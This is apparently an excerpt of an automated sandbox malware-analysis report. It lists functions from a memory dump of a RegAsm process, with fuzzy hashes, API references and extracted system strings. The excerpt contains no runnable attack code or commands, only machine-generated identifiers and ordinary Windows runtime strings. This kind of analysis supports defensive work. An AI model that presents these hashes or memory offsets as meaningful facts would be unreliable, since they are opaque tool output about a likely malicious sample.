                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                    • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                    • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                    • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                    Function 022AFC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Function 022AFC48 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                    • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                    • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                    • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                    Function 022AFC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Function 022AFD5C Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                    • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                    • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                    • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                    Function 022AFD8C Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                    Function 022B1D80 Relevance: .0, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                    • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                    • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                    • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                    Function 022D8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • Kernel-MUI-Language-SKU, xrefs: 022D89FC
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 022D8914
                                                    • WindowsExcludedProcs, xrefs: 022D87C1
                                                    • Kernel-MUI-Language-Allowed, xrefs: 022D8827
                                                    • Kernel-MUI-Number-Allowed, xrefs: 022D87E6
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: _wcspbrk
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 402402107-258546922
                                                    • Opcode ID: 4369711adfa5c1dc455a2e3fffed765c3586279856a9dcd67fe747b6ba59e384
                                                    • Instruction ID: e3517270dad52de74dbe7303274d5b02bd51e708b5607ac5eaf8aacef429fa02
                                                    • Opcode Fuzzy Hash: 4369711adfa5c1dc455a2e3fffed765c3586279856a9dcd67fe747b6ba59e384
                                                    • Instruction Fuzzy Hash: 4FF1E3B2D20209EFDF11EFD8C9809EEBBB9BF08304F15446AE505A7215E734AA45DF61
                                                    Function 0234822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: _wcsnlen
                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                    • API String ID: 3628947076-1387797911
                                                    • Opcode ID: ef9032f83217d3a38731bf49a08d0842ecce512ee264a9fa5b3bab9ba7da0e95
                                                    • Instruction ID: b697ac7b7a22e6fe2a510fe9da8508a2ac4c86dc38c3f29e37a372f342c249e9
                                                    • Opcode Fuzzy Hash: ef9032f83217d3a38731bf49a08d0842ecce512ee264a9fa5b3bab9ba7da0e95
                                                    • Instruction Fuzzy Hash: 2341B475240319BAFB219AA1CC81FDEB7EDAF05748F004162FA05D6190DBB1FB558BA4
                                                    Function 022F13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 721d309c38c64b4c50a2e44d922f046918a98c35e7d050a8379860a54d1e615c
                                                    • Instruction ID: 8b601857761e457fc4eb3ef72046f88f1e63f76e8de5a691a5e3703e7ef5e3db
                                                    • Opcode Fuzzy Hash: 721d309c38c64b4c50a2e44d922f046918a98c35e7d050a8379860a54d1e615c
                                                    • Instruction Fuzzy Hash: A5612571920656EADF28DFD9C8908BEFBB5EFC4300B94C02DEA9A47548D375A650CB60
                                                    Function 02353B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 89f3223cc0c015bb573eca3020ea67b424d6a853cb00425c0abd1371af2a34ab
                                                    • Instruction ID: eea62bd93fe5a02a91a03017307c4e5289fd2930552aa3e4f93c58a0ba89cd17
                                                    • Opcode Fuzzy Hash: 89f3223cc0c015bb573eca3020ea67b424d6a853cb00425c0abd1371af2a34ab
                                                    • Instruction Fuzzy Hash: 0161C772900658ABDF21DF99C8409BE7BF5EF48390B14C5AAFCAD97505D334EA80CB60
                                                    Function 022E7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02303F12
                                                    Strings
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0230E345
                                                    • Execute=1, xrefs: 02303F5E
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0230E2FB
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02303F4A
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02303EC4
                                                    • ExecuteOptions, xrefs: 02303F04
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02303F75
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: BaseDataModuleQuery
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 3901378454-484625025
                                                    • Opcode ID: 0d2278e653f0d46dcbd8c3f1088fbd76332d7ae7c3d365b963209d85f1a9d57b
                                                    • Instruction ID: 8dd49c32037cb557b89846fde0e24a570e9becfd5412f5c3dee36b01a9a98fd5
                                                    • Opcode Fuzzy Hash: 0d2278e653f0d46dcbd8c3f1088fbd76332d7ae7c3d365b963209d85f1a9d57b
                                                    • Instruction Fuzzy Hash: 4C41E972A9030CBAEF219AD4DCD5FDAB3BDAF14704F4005A9E506A6084EB70EA459F71
                                                    Function 022F0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID: .$:$:
                                                    • API String ID: 3965848254-2308638275
                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction ID: 20d9d27ebc41b10fa5badad31fea08d39259fbf59e69a011a36e67e2d4a1613a
                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                    • Instruction Fuzzy Hash: 79A19C71D2030ADADFA4CFE4C8446AEF7B5AF04308F24847ADA06A728ED7749B45CB51
                                                    Function 022F0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02312206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: 85d1611344de3a55a6354f9a3968a050f4a0527848160f77f5b5ba1926949159
                                                    • Instruction ID: 2b6723b776fdca9047302124834a4019cf36e4da18d1348ee5d0998a53c304a1
                                                    • Opcode Fuzzy Hash: 85d1611344de3a55a6354f9a3968a050f4a0527848160f77f5b5ba1926949159
                                                    • Instruction Fuzzy Hash: 56514C317103116FEB69DA58CCC1FA773AAAF88710F214269FD45DB289DA71EC42CB90
                                                    Function 022F14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 0231EA22
                                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F146B
                                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F1490
                                                    • ___swprintf_l.LIBCMT ref: 022F156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: a69d636a76d4bcba3aa7ebcf0f5bb6285c78867fa3d693a668c8472ba64a1c27
                                                    • Instruction ID: 034a2825ba76def1e86ddb502db896597d5ca2fb355766df7f6821a654e42c5a
                                                    • Opcode Fuzzy Hash: a69d636a76d4bcba3aa7ebcf0f5bb6285c78867fa3d693a668c8472ba64a1c27
                                                    • Instruction Fuzzy Hash: 9221C572920219DBDF61DED4CC41AEEB3ACAF10704F844125EE4AE3148DB71AA688BD1
                                                    Function 02353DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
